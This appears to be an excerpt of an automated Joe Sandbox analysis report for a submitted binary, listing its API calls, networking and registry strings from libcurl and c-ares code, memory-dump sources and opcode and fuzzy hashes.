                                            • Associated: 00000000.00000002.2403268234.0000000000F7C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000000F7E000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001221000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001227000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.0000000001305000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000130D000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403289293.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2403715380.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                                            • Associated: 00000000.00000002.2404548181.00000000014DB000.00000040.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: setsockopt
                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                            • API String ID: 3981526788-2373386790
                                            • Opcode ID: f5dc340ecc7263aaf436ecdd6a1dc4dc3e9ad09a2de8c2072297a75b74384b05
                                            • Instruction ID: 5b2c7182fe436bf627802f32659d698bc123a3a1dcb6cce134a0414431ff962d
                                            • Opcode Fuzzy Hash: f5dc340ecc7263aaf436ecdd6a1dc4dc3e9ad09a2de8c2072297a75b74384b05
                                            • Instruction Fuzzy Hash: 6D620471508341ABE7248F24C846BABB7E4FF91314F144A2AF988D7392E771E945CB93

                                            Control-flow Graph

                                            • [Figure: control_flow_graph 858, starting at block 969740-96975b; legend: Executed / Not Executed; nodes reference RegOpenKeyExA, RegQueryValueExA, RegCloseKey]
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00969946
                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00969974
                                            • RegCloseKey.KERNELBASE(?), ref: 0096998B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                            • API String ID: 3677997916-4129964100
                                            • Opcode ID: e4e87499ff87ddcfb45cde102a109a3bcbc11c6392a080f58cb34bdd7b9bf880
                                            • Instruction ID: 3f733f92d4ea199247b2c2a613678825f1585a008cdcb8485d281b681630516a
                                            • Opcode Fuzzy Hash: e4e87499ff87ddcfb45cde102a109a3bcbc11c6392a080f58cb34bdd7b9bf880
                                            • Instruction Fuzzy Hash: FC32A6B5904201ABEB11AF25ED42B1B76DCAF95359F084834FC0997262F732EE18D793

                                            Control-flow Graph

                                            • [Figure: control_flow_graph 1361, starting at block 8d8b50-8d8b69; legend: Executed / Not Executed; nodes reference connect, SleepEx]
                                            APIs
                                            • connect.WS2_32(?,?,00000001), ref: 008D8C30
                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 008D8CF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Similarity
                                            • API ID: Sleepconnect
                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                            • API String ID: 238548546-879669977
                                            • Opcode ID: c1697650cd784d6d47a3675d3cf62539941123f8bc3181bb2dc2d69c6e4644c5
                                            • Instruction ID: 909864455b8c57076920c27a7e8e3ae558814e7d5006a67a8bb15e88346803d0
                                            • Opcode Fuzzy Hash: c1697650cd784d6d47a3675d3cf62539941123f8bc3181bb2dc2d69c6e4644c5
                                            • Instruction Fuzzy Hash: 4CB19E70604706EFDB11CF24C985BA6B7A1FF45328F14862AE859DB3D2DB71E844CB62

                                            Control-flow Graph

                                            • [Figure: control_flow_graph 1455, starting at block 8a2f17-8a2f8c; legend: Executed / Not Executed; nodes reference RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey]
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Similarity
                                            • API ID: CloseEnumOpen
                                            • String ID: d
                                            • API String ID: 1332880857-2564639436
                                            • Opcode ID: f1f0aec8701eea1163d9bd56ae6e66ab3581482d10588f852869bb6164930c3a
                                            • Instruction ID: 19daba4672b25e6a04052e29dfc39c8e1e1c36dcdc8e42bb894583d9be0f6880
                                            • Opcode Fuzzy Hash: f1f0aec8701eea1163d9bd56ae6e66ab3581482d10588f852869bb6164930c3a
                                            • Instruction Fuzzy Hash: 2E7192B49043199FDB10EF69D58579EBBF0FF85318F108869E898A7301D7749A88CF92

                                            Control-flow Graph

                                            • [Figure: control_flow_graph 1488, starting at block 8d9290-8d92ed; legend: Executed / Not Executed; nodes reference WSAIoctl, setsockopt]
                                            APIs
                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 008D935D
                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 008D9389
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Similarity
                                            • API ID: Ioctlsetsockopt
                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                            • API String ID: 1903391676-2691795271
                                            • Opcode ID: 35b7a0b462928e8afff7471dfed91be2551c27d9326ba12117b05a7c81ece040
                                            • Instruction ID: d04b0937159e5942c5d4cadc43585a4b995729cbe30713f19e9e92e3b47a7c22
                                            • Opcode Fuzzy Hash: 35b7a0b462928e8afff7471dfed91be2551c27d9326ba12117b05a7c81ece040
                                            • Instruction Fuzzy Hash: DC51B274604305ABE714DF28C881FAAB7A5FF85314F14862AFD98DB382E730E951C791

                                            Control-flow Graph

                                            • [Figure: control_flow_graph 1522, starting at block 8a76a0-8a76be; legend: Executed / Not Executed; nodes reference send]
                                            APIs
                                            • send.WS2_32(multi.c,?,?,?,008A3D4E,00000000,?,?,008B07BF), ref: 008A76EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Similarity
                                            • API ID: send
                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                            • API String ID: 2809346765-3388739168
                                            • Opcode ID: 946504258111dcda3ce98ded04bfa397d1fae187bde4a81d4f21951585e494b6
                                            • Instruction ID: 633882a73a2aa53cf4357c66ff456980b8f057750c1644db217bf72d0016f48c
                                            • Opcode Fuzzy Hash: 946504258111dcda3ce98ded04bfa397d1fae187bde4a81d4f21951585e494b6
                                            • Instruction Fuzzy Hash: F9113AB06093087BF5105B29AC4AE6B3B5CEBC3B2CF441518F809A3751E2619D40A2F3

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at 96aa30; legend: Executed / Not Executed]
                                            APIs
                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0096AB9A
                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0096ABE4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ioctlsocketsocket
                                            • String ID: ;z
                                            • API String ID: 416004797-1617089705
                                            • Opcode ID: 10eb13101cdb0dff6d7ac95544653833c5bef52863bacb6900bc15c34ae127da
                                            • Instruction ID: 01773c537b9790ca5a6b78e28782fd65dd234920132c9a6e1f5f0ddf29d63b00
                                            • Opcode Fuzzy Hash: 10eb13101cdb0dff6d7ac95544653833c5bef52863bacb6900bc15c34ae127da
                                            • Instruction Fuzzy Hash: 94E1CF706043019BEB20CF24C885B6BB7E9EF89310F144A2DF999AB291D776D944DF92

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at 8a7770; legend: Executed / Not Executed]
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: recv
                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                            • API String ID: 1507349165-640788491
                                            • Opcode ID: 7503a00f10a534ced7afd131656f27575dabda19500dd0809e6c504895414e4b
                                            • Instruction ID: d89711edb281897ed9dc6c6ed29155d2fd95a0ed1dd7184a250dcc9e2374b15b
                                            • Opcode Fuzzy Hash: 7503a00f10a534ced7afd131656f27575dabda19500dd0809e6c504895414e4b
                                            • Instruction Fuzzy Hash: 89113DB4A093483BF1209714AC4AF7B3B5CEBC7B7CF040528F809A3352E6519C4491F2

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at 8a75e0; legend: Executed / Not Executed]
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                            • API String ID: 98920635-842387772
                                            • Opcode ID: 83bc32aafcfc8a4da10107b67bf96157f29d6b2ad84615eecd79e78e5cbe226a
                                            • Instruction ID: 2b30ee836359b79dabee40e493a5e29554676e4259f541f23c10bcca5c86fdfd
                                            • Opcode Fuzzy Hash: 83bc32aafcfc8a4da10107b67bf96157f29d6b2ad84615eecd79e78e5cbe226a
                                            • Instruction Fuzzy Hash: 40114876B0571137E610572DAC06FDB3B88EF92734F051524F818E22E2D312C9A4F2E2

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at c28e90; legend: Executed / Not Executed]
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: _open
                                            • String ID: terminated$@
                                            • API String ID: 4183159743-3016906910
                                            • Opcode ID: 81f979119b3389291453696a34b2ac50906a37cba28608a43bec7a97bcc435ff
                                            • Instruction ID: 040d78e4448007a10cf3e2fce207899b74d1505aeefa3a4d09d515dded0159db
                                            • Opcode Fuzzy Hash: 81f979119b3389291453696a34b2ac50906a37cba28608a43bec7a97bcc435ff
                                            • Instruction Fuzzy Hash: B1418BB49053158FDB10EFB9D84466EBBF4AB88314F048A2DE898D7240E774C949DF62

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at 8da150; legend: Executed / Not Executed]
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 008DA1C7
                                            Strings
                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 008DA23B
                                            • getsockname() failed with errno %d: %s, xrefs: 008DA1F0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                            • API String ID: 3358416759-2605427207
                                            • Opcode ID: bdeea475cf0288dc10e31e233a0d89f2ae0e7575b3ca01db793dd1c036956049
                                            • Instruction ID: 88924e33132988f0c3ad50032b10a64a8257a7ef1aeaaae90c33cc37316f772a
                                            • Opcode Fuzzy Hash: bdeea475cf0288dc10e31e233a0d89f2ae0e7575b3ca01db793dd1c036956049
                                            • Instruction Fuzzy Hash: 3E21F871808780BAE6259729EC42FE673ACFF91328F040655F98893151FE32698686E3

                                            Control-flow Graph
                                            [Figure: control-flow graph of the function starting at 8bd5e0; legend: Executed / Not Executed]
                                            APIs
                                            • WSAStartup.WS2_32(00000202), ref: 008BD65A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: Startup
                                            • String ID: if_nametoindex$iphlpapi.dll
                                            • API String ID: 724789610-3097795196
                                            • Opcode ID: 0324ee14d64e62b996982568973d90756ac217ed18c5e927b529e0ce97d4487f
                                            • Instruction ID: c8b0ed0d80c9d15d8456de0c3ff924dc35d70b7342020ff01fd0da00f367c7ac
                                            • Opcode Fuzzy Hash: 0324ee14d64e62b996982568973d90756ac217ed18c5e927b529e0ce97d4487f
                                            • Instruction Fuzzy Hash: 52012BD0D4034576E7216B3CAC1B7A63690BB63308F452478D888E52D2F769C988D2D3
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID: FD %s:%d sclose(%d)
                                            • API String ID: 2781271927-3116021458
                                            • Opcode ID: b57c312634e25d0a3c0d10335a4c126abc9be3bfdbb6603993862ba928dc5e67
                                            • Instruction ID: a217e8b49589c0e94d17ffa1d19d16b955b6464dcd9fa2f1409a17f5adced151
                                            • Opcode Fuzzy Hash: b57c312634e25d0a3c0d10335a4c126abc9be3bfdbb6603993862ba928dc5e67
                                            • Instruction Fuzzy Hash: 34D05E33A092212B852069997C49C9B6BA8EDC7F60F4A0C68F941B7605D1209C4097E2
                                            APIs
                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0096B29E,?,00000000,?,?), ref: 0096B0B9
                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00953C41,00000000), ref: 0096B0C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ErrorLastconnect
                                            • String ID:
                                            • API String ID: 374722065-0
                                            • Opcode ID: ce6f4ef1d31ec3275e9497097003df4730124da6a8d7a14e0bfe642f3692a237
                                            • Instruction ID: 151131dc52e2c84676c4a80067e7239f7b6506c76604208afb568c4a9e3d7182
                                            • Opcode Fuzzy Hash: ce6f4ef1d31ec3275e9497097003df4730124da6a8d7a14e0bfe642f3692a237
                                            • Instruction Fuzzy Hash: DE01D8322043005BCA205A798C44F6BBB9DFF89364F040B14F97CD31D1E726DD909752
                                            APIs
                                            • gethostname.WS2_32(00000000,00000040), ref: 00954AA5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: gethostname
                                            • String ID:
                                            • API String ID: 144339138-0
                                            • Opcode ID: c5b88dcb4b9d2b7660bfb2bbe61e82e5220004c749fa712b2ac0ce9058502fde
                                            • Instruction ID: 886d42d26ac84bdb003694dcad21ebd49cbb77fa59604f47b432e3e7e73de711
                                            • Opcode Fuzzy Hash: c5b88dcb4b9d2b7660bfb2bbe61e82e5220004c749fa712b2ac0ce9058502fde
                                            • Instruction Fuzzy Hash: 9B51A0706043008BE7B0DB27DD4A72776E8AF4171EF14193DED8A87691E775E888C702
                                            APIs
                                            • getsockname.WS2_32(?,?,00000080), ref: 0096AFD1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: getsockname
                                            • String ID:
                                            • API String ID: 3358416759-0
                                            • Opcode ID: de1e4a533987e4f8fcfbc4faad9277bf0b46aa92a3adb15dd56d19933d5253e8
                                            • Instruction ID: cad4d8d6ef054e97afaa8f5075b6aacf1a179a8dcd247b953661939d0ab97e0a
                                            • Opcode Fuzzy Hash: de1e4a533987e4f8fcfbc4faad9277bf0b46aa92a3adb15dd56d19933d5253e8
                                            • Instruction Fuzzy Hash: A011967080878595EB268F18D4027F6F3F8EFD0329F109A19E59942150F7365AC58BC2
                                            APIs
                                            • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0096A97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID:
                                            • API String ID: 2809346765-0
                                            • Opcode ID: 3cb2bda3c5c560335e2af28692697fb779ead1548e09378ddb97eff788106e39
                                            • Instruction ID: 72c361baa624ecf683859b0db9d018a16f9e698b3f40585e84846b44d4cad8d5
                                            • Opcode Fuzzy Hash: 3cb2bda3c5c560335e2af28692697fb779ead1548e09378ddb97eff788106e39
                                            • Instruction Fuzzy Hash: 5201A272B01710AFD6148F25DC45B5AB7A5EF84720F168659EA982B361C331AC108BD1
                                            APIs
                                            • socket.WS2_32(?,0096B280,00000000,-00000001,00000000,0096B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0096AF67
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID:
                                            • API String ID: 98920635-0
                                            • Opcode ID: 0cff25c7f5fe15117874fcec804a6cf760e1f2648f8b576b487f854c69ea5d87
                                            • Instruction ID: 212fb43be199ecb0dce05da29b790fc39e2e7965c19288a403f8ec7953346f21
                                            • Opcode Fuzzy Hash: 0cff25c7f5fe15117874fcec804a6cf760e1f2648f8b576b487f854c69ea5d87
                                            • Instruction Fuzzy Hash: 17E0E5B6A093216FD664DA58E944AABF3ADEFC4B20F055A49B85467304C330AC508BE2
                                            APIs
                                            • closesocket.WS2_32(?,00969422,?,?,?,?,?,?,?,?,?,?,?,00953377,00D34C60,00000000), ref: 0096B04D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: closesocket
                                            • String ID:
                                            • API String ID: 2781271927-0
                                            • Opcode ID: d8d7da2d8ae23dc4ff6d0a1cb22cb6165b58175ab9bf24f6550eed4d277abc74
                                            • Instruction ID: f4a5fa775fe79657379e7d7ce39d9171aa88e4a73e898a77cedbecdc96fca6bc
                                            • Opcode Fuzzy Hash: d8d7da2d8ae23dc4ff6d0a1cb22cb6165b58175ab9bf24f6550eed4d277abc74
                                            • Instruction Fuzzy Hash: E1D0123870020197CA249A14C994A6B7A6F7FD1710FA9CB68E42C8A559E73BDC879641
                                            APIs
                                            • ioctlsocket.WS2_32(?,8004667E,?,?,008DAF56,?,00000001), ref: 009067FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: ioctlsocket
                                            • String ID:
                                            • API String ID: 3577187118-0
                                            • Opcode ID: 4dfd52ce2d9e906178b0f789d9704a4f36afb4e0f23f238318a8178881e8ca39
                                            • Instruction ID: 22ca030f1aabd4053b127202eebc86d86a953b218bbbe7a42af040ea4d72fcfd
                                            • Opcode Fuzzy Hash: 4dfd52ce2d9e906178b0f789d9704a4f36afb4e0f23f238318a8178881e8ca39
                                            • Instruction Fuzzy Hash: 21C012F1109200AFC60C4B24D855A6EB6D8DB85255F01591CB04A92180EA349454CA1A
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 80a0011adbd7dbb439506d311d97c06db93e92cbb5451ad9fa50126ceba24948
                                            • Instruction ID: c493937cf7e17f9be27cb2828c9fe55b11472ec7dba8fa01f6fb39f8e941822e
                                            • Opcode Fuzzy Hash: 80a0011adbd7dbb439506d311d97c06db93e92cbb5451ad9fa50126ceba24948
                                            • Instruction Fuzzy Hash: 5631A2B49093149BCB00EFB8D58569EBBF0FF45304F008969E898E7201E7749A84DFA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$`W$`W$bW$bW$bW$file$file://%s%s%s$https$urlapi.c$vW$vW$xn--
                                            • API String ID: 0-3916423684
                                            • Opcode ID: fc5439fb008cd7afcc4c19b6032c39bf04a0f674ac09ef25fa4b3cf2d0122ae1
                                            • Instruction ID: 453fdbb25b9deb810e96541841ffea74273efe5a0b4e5a5d04ff748b309f613c
                                            • Opcode Fuzzy Hash: fc5439fb008cd7afcc4c19b6032c39bf04a0f674ac09ef25fa4b3cf2d0122ae1
                                            • Instruction Fuzzy Hash: 5F720671608B419FEB258A28C546FA677E2FF91344F08862CED85DB292E776F8C4C741
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                            • API String ID: 0-122532811
                                            • Opcode ID: fa43d17f87559635acca2bbea5de7d6ca5473b6dcaeb08c0f55af0d839e599aa
                                            • Instruction ID: e56da7f988f61ff8c7b8b2c76e2f527398b24fbe1420f82f5bfa492ced48c904
                                            • Opcode Fuzzy Hash: fa43d17f87559635acca2bbea5de7d6ca5473b6dcaeb08c0f55af0d839e599aa
                                            • Instruction Fuzzy Hash: 2142E771B08700AFD718DE28DC41BABB6EAFBC4704F048A2CF55D97392D775A9148B92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$;$?$?$xn--$xn--
                                            • API String ID: 0-543057197
                                            • Opcode ID: 011d1c4f55815c80e9c7475b8443b86753cef7dfa4d738555c0fdef4e87d25fa
                                            • Instruction ID: 3f301b636de7410e5d06bf1d10a0d04811c5b611253af086e383718a34556add
                                            • Opcode Fuzzy Hash: 011d1c4f55815c80e9c7475b8443b86753cef7dfa4d738555c0fdef4e87d25fa
                                            • Instruction Fuzzy Hash: C62206B2A083019BEB209A24EC65B6B77D9AFD4348F04493CF959D7292FB35DD04C792
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $d$nil)
                                            • API String ID: 0-394766432
                                            • Opcode ID: 8a8557eaf1513895923dd0638674b8f0db18f74df2f0cd9eaeb3fc3943f3af88
                                            • Instruction ID: b5724def80c87647c86b6fb3b038de556899115f644806d8153bc43e2e383118
                                            • Opcode Fuzzy Hash: 8a8557eaf1513895923dd0638674b8f0db18f74df2f0cd9eaeb3fc3943f3af88
                                            • Instruction Fuzzy Hash: D2139B716083258FC720CF29D08062ABBF1BF89714F244A2DF9A59B761D771ED49DB82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            • Opcode ID: 2766db1f9f7fdd5c46e6b53884ade3afd93eec756b4f9d8cd5c13e8c4ceedb91
                                            • Instruction ID: ef2b2d9ba660ea5109b758105bb97ae2ac09a7bb5cce6a58f2c1a501ce9bbcaf
                                            • Opcode Fuzzy Hash: 2766db1f9f7fdd5c46e6b53884ade3afd93eec756b4f9d8cd5c13e8c4ceedb91
                                            • Instruction Fuzzy Hash: 84C27C316087558FE718CE28C49076AB7E2FFCA324F15892DE899DB752D730ED458B82
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                            • API String ID: 0-2555271450
                                            • Opcode ID: cb92d1207b548500b88658e1df3d9718172ba1d3c20dac7e90f3cee990623cbf
                                            • Instruction ID: 6b0664a4f8945613c30bd868dad91fc5f4807935d0a11d331f95d875bfb82721
                                            • Opcode Fuzzy Hash: cb92d1207b548500b88658e1df3d9718172ba1d3c20dac7e90f3cee990623cbf
                                            • Instruction Fuzzy Hash: 1C827D71A083119FE714CE68C88072AB7E1FFCA724F148A2DF9A9D7692D730DC458B52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2402681131.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8a0000_qZA8AyGxiA.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: default$login$macdef$machine$netrc.c$password
                                            • API String ID: 0-1043775505
                                            • Opcode ID: 854bf0bcde6dd8dc9876ca00bcf965312bdd74958904e98131bd6b656da4aba9
                                            • Instruction ID: 4f2f626f20fba5677f8ce1be5a8becc29b0ac289c26738b48395e26d323305b1
                                            • Opcode Fuzzy Hash: 854bf0bcde6dd8dc9876ca00bcf965312bdd74958904e98131bd6b656da4aba9
